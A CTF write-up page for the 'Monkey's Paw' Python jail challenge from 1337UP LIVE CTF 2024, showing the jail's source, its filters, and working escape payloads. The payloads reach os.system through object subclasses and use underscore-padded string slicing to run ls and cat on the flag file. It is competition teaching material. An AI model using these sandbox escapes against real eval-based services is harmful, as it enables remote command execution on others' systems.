⏪
CTFs
TwitterGithub
  • 👋Introduction
  • 📚Write Up
    • 2024
      • 📖1337UP LIVE CTF
        • Reverse Engineering
        • Mobile
        • Forensic
        • Misc
      • 📖HKCERT CTF Quals
        • Reverse Engineering
        • Binary Exploitation
      • 📖Flare-On 11
        • Challenge #1 - frog
      • 📖Intechfest
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Mobile
      • 📖Cyber Breaker Competition (1v1)
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
        • Binary Exploitation
      • 📖Cyber Breaker Competition Quals
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
      • 📖BlackHat MEA Quals
        • Reverse Engineering
        • Forensic
      • 📖TFC CTF
        • Reverse Engineering
        • Forensic
        • Misc
      • 📖DeadSec CTF
        • Reverse Engineering
        • Web Exploitation
      • 📖Aptos - Code Collision CTF
        • Reverse Engineering
        • Misc
      • 📖DownUnder CTF
        • Reverse Engineering
      • 📖JustCTF
        • Reverse Engineering
        • Forensic
        • Misc
      • 📖Akasec CTF
        • Reverse Engineering
        • Forensic
      • 📖Codegate CTF Preliminary
        • Reverse Engineering
      • 📖NahamCon CTF
        • Cryptography
        • Reverse Engineering
        • Malware
        • Misc
        • Mobile
        • Scripting
        • Web Exploitation
        • Forensic
      • 📖SAS CTF Quals
        • Reverse Engineering
      • 📖SwampCTF
        • Reverse Engineering
        • Misc
        • Cryptography
      • 📖UNbreakable International
        • Reverse Engineering
        • Network
        • Cryptography
      • 📖ACSC
        • Reverse Engineering
        • Hardware
        • Web Exploitation
      • 📖0xL4ugh
        • Mobile
    • 2023
      • 📖BlackHat MEA Final
        • Reverse Engineering
        • Web Exploitation
      • 📖Flare-On 10
        • Challenge #1 - X
        • Challenge #2 - ItsOnFire
        • Challenge #3 - mypassion
        • Challenge #4 - aimbot
        • Challenge #5 - where_am_i
        • Challenge #6 - FlareSay
        • Challenge #7 - flake
        • Challenge #8 - AmongRust
        • Challenge #9 - mbransom
        • Challenge #10 - kupo
        • Challenge #11 - over_the_rainbow
        • Challenge #12 - HVM
        • Challenge #13 - y0da
      • 📖LakeCTF Quals
        • Reverse Engineering
        • Cryptography
      • 📖TSG CTF
        • Reverse Engineering
        • Cryptography
      • 📖ISITDTU Quals
        • Web Exploitation
        • Misc
        • Reverse Engineering
      • 📖BlackHat MEA Quals
        • Reverse Engineering
      • 📖ASCIS Final
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
      • 📖ASCIS Quals
        • Reverse Engineering
        • Forensic
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
        • Misc
      • 📖Cyber Jawara International
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Web Exploitation
      • 📖Intechfest
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Mobile
      • 📖CSAW Quals
        • Reverse Engineering
      • 📖SECCON Quals
        • Reverse Engineering
      • 📖CTFZone Quals
        • Reverse Engineering
      • 📖Securinets Quals
        • Reverse Engineering
      • 📖Compfest Final (Attack Defense)
        • Web Exploitation
        • Cryptography
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
        • Forensic
        • Misc
      • 📖Tenable
        • Reverse Engineering
        • Cryptography
        • Steganography
      • 📖ASCWG Quals
        • Reverse Engineering
        • Cryptography
      • 📖Gemastik Quals
        • Reverse Engineering
      • 📖BSides Indore
        • Reverse Engineering
        • Cryptography
      • 📖NahamCon CTF
        • Cryptography
      • 📖HSCTF
        • Reverse Engineering
        • Cryptography
        • Web Exploitation
        • Misc
      • 📖ACSC
        • Reverse Engineering
      • 📖HackTM Quals
        • Reverse Engineering
    • 2022
      • 📖Intechfest
        • Reverse Engineering
        • Mobile
        • Cryptography
      • 📖NCW Final
        • Reverse Engineering
      • 📖NCW Quals
        • Reverse Engineering
        • Misc
        • Cryptography
      • 📖Compfest Final
        • Reverse Engineering
        • Forensic
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
        • Forensic
    • 2021
      • 📖Cyber Jawara Final
        • Reverse Engineering
      • 📖Cyber Jawara Quals
        • Reverse Engineering
        • Cryptography
      • 📖DarkCon CTF
        • Reverse Engineering
      • 📖Wreck IT Quals
        • Mobile
      • 📖MDT4.0 Final
        • Reverse Engineering
        • Cryptography
        • Forensic
      • 📖MDT4.0 Quals
        • Reverse Engineering
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
      • 📖Compfest Final
        • Reverse Engineering
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
    • 2020
      • 📖Deep CTF
        • Reverse Engineering
  • 🚩Lifetime CTF
    • 📖Hack The Box
      • Reverse Engineering
        • TBU
Powered by GitBook
On this page
  • Monkey's Paw (384 pts)
  • Description
  • Solution
  1. Write Up
  2. 2024
  3. 1337UP LIVE CTF

Misc

Challenge
Link

Monkey's Paw (384 pts)

Monkey's Paw (384 pts)

Description

I wish these modern pyjails would let me use dunders more..

Solution

This challenge is pyjail and the objective is finding the way to do RCE on server through bypassing some blacklist.

#!/usr/local/bin/python3.13 -S

def die():
    print("Don't be greedy")
    exit(1)


def check_code(code):
    to_check = ["co_consts", "co_names",
                "co_varnames", "co_freevars", "co_cellvars"]
    for attr in to_check:
        for obj in getattr(code, attr):
            if type(obj) is not str or \
                    len(obj) < 5 or \
                    obj[:2] + obj[-2:] != '____':
                die()


code = input("Be careful what you wish for: ")
if "\"'" in code:
    die()

code = compile(code, "<string>", "eval")
check_code(code)
eval(code, {'__builtins__': {}})

There are total 5 protection implemented in the code, below is the details (simplified explanation)

  • Line 13: The value other then function or attribute can only be string (we can't use integer etc)

  • Line 14: The length of all the values should be greater than 4

  • Line 15: The value must be consist of __ in the start and in the end

  • Line 20: We cannot use the exact "' values

  • Line 25: builtins functions are removed

My teammate (daffainfo) send the payload that would be work without the blacklist (1-4).

"().__class__.__base__.__subclasses__()[116].__init__.__builtins__['__import__']('os').__getattribute__('system')('ls')"

My task is converting the payload to make it work with the blacklist. Here is the bypass idea

  • To get the integer value we can use __len__()

  • To use string values that dont have "__" we can use padding and indext subscribe

And below is the converted payload

  • do ls

__builtins__.__class__.__base__.__subclasses__()["____________________________________________________________________________________________________________________".__len__()].__init__.__builtins__['__import__']('______os_____'["______".__len__():"________".__len__()]).__getattribute__('______system_____'["______".__len__():"____________".__len__()])('______ls_____'["______".__len__():"________".__len__()])
  • do cat flag_RRkxxMoAAG3mQpoq.txt

__builtins__.__class__.__base__.__subclasses__()["____________________________________________________________________________________________________________________".__len__()].__init__.__builtins__['__import__']('______os_____'["______".__len__():"________".__len__()]).__getattribute__('______system_____'["______".__len__():"____________".__len__()])('______cat flag_RRkxxMoAAG3mQpoq.txt_____'["______".__len__():"___________________________________".__len__()])

Flag: INTIGRITI{y0ur_w15h_w45_6r4n73d_bu7_47_wh47_c057}

PreviousForensicNextHKCERT CTF Quals

Last updated 5 months ago

📚
📖
Here